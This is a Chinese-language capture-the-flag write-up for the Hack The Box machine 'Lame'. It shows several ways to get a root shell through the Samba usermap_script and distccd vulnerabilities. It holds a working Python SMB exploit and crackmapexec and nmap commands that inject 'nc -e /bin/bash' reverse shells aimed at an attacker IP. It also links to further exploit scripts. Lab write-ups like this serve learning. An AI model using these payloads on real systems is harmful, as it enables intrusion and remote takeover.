• HTB-靶机-Lame


    本篇文章仅用于技术交流学习和研究的目的,严禁使用文章中的技术用于非法目的和破坏,否则造成一切后果与发表本文章的作者无关

    靶机是作者购买VIP使用退役靶机操作,显示IP地址为10.10.10.3

    sudo nmap -n -p- -sC -sV -T5 -oN lame.nmap 10.10.10.3

    nmap扫描结果

    根据扫描结果,试了下vsftp的后门利用代码,对于exploit https://www.exploit-db.com/exploits/17491 确认不可利用,所以此靶机靶机很简单直接直接使用smb对应的exp即可

    姿势一:MSF

    拿到权限获取root.txt信息即可

    对应payload 代码:https://www.exploit-db.com/exploits/16320 

    姿势二:python脚本exploit

    #!/usr/bin/python
    
    from smb.SMBConnection import SMBConnection
    from smb import smb_structs
    smb_structs.SUPPORT_SMB2 = False
    import sys
    if len(sys.argv) < 2:
        print ("
    Usage: " + sys.argv[0] + " <HOST>
    ")
        sys.exit()
    
    
    
    username = "/=`nc -e /bin/bash 10.10.14.4 8833`"
    password = ""
    conn = SMBConnection(username, password, "HACKTHEBOX" , "HTB", use_ntlm_v2 = False)
    assert conn.connect(sys.argv[1], 445)
    
    =======================================
    python3

    另一款类似的python利用代码
    https://github.com/amriunix/CVE-2007-2447/blob/master/usermap_script.py

    姿势三:利用distccd 反弹shell

    通过在msf中搜索 distccd 即可找到对应的exp,然后利用,拿到shell之后通过提权脚本检查目标靶机的所有权限,得知nmap可以直接使用交互式模式直接提权 ,提权检查脚本 https://github.com/sleventyeleven/linuxprivchecker/blob/master/linuxprivchecker.py

    姿势四:通过python脚本利用distccd

    对应的python2版本的利用代码地址:https://gist.githubusercontent.com/DarkCoderSc/4dbf6229a93e75c3bdf6b467e67a9855/raw/48ab4eb0bd69cac67bc97fbe182e39e5ded99f9f/distccd_rce_CVE-2004-2687.py

    姿势五:直接手动利用samba 3.2漏洞

    PS:这里有个小坑,在使用enum4linux ,smbclient等命令的时候如果是最新版,那么在枚举此靶机目标的时候会报错,无法枚举,经过排查确认是因为最新版已经移除了就的相关协议,所以我们需要加上即可,具体添加如下信息:

    sudo vim /etc/samba/smb.conf
    添加
    [global]
    client min protocol=NT1
    或者
    smbclient -N //10.10.10.3/tmp --option='client min protocol=NT1'

    上述还可以使用神器cme 地址:https://github.com/byt3bl33d3r/CrackMapExec/releases

    对应的各种可能的命令:

    smb -x "./=`nohup nc -e /bin/sh 10.10.14.4 6644`" --exec-method smbexec 10.10.10.3
    smb --shares 10.10.10.3 -u './=`nohup nc -e /bin/sh 10.10.14.17 6644`' -p ''

    姿势六:使用nmap脚本拿shell

    nmap -p3632 10.10.10.3 --script distcc-exec --script-args="distcc-exec.cmd='nc -e /bin/bash 10.10.14.4 4444'"

    我测试没有成功,上述执行报错

    总结:本靶机难度很低,不过思路方法很多,有手动,有自动,使用metasploit是最low的一种方式,所以还是建议使用手动知其然知其所以然才可用,这里可参考这博客还有其他两种姿势:

    https://coldfusionx.github.io/posts/LameHTB/  
    https://noobsec.net/hackthebox/htb-lame/
    https://github.com/gwyomarch/Lame-HTB-Writeup-FR
    https://0xdf.gitlab.io/2020/04/07/htb-lame.html
    迷茫的人生,需要不断努力,才能看清远方模糊的志向!
  • 相关阅读:
    Spring boot 优雅实现全局自定义异常
    多线程基本知识
    软件测试开发实战 | 记录写装饰器时踩的几个坑
    软件测试 | charles 中文乱码问题【已解决】
    测试人生 | 折腾 6 年踩坑无数的“笨小孩”:方向对了,路就不会遥远!
    软件测试 | 读懂 Appium 日志,让测试效率翻倍!
    Appium 实践 | 让测试更快更稳更可靠:片状测试
    软件测试实践干货 | 测试登录功能的思路与原理解析(基于 Spring Security)
    软件测试
    PageObject(PO)设计模式在 UI 自动化中的实践总结(以 QQ 邮箱登陆为例)
  • 原文地址:https://www.cnblogs.com/autopwn/p/13886221.html
Copyright © 2020-2023  润新知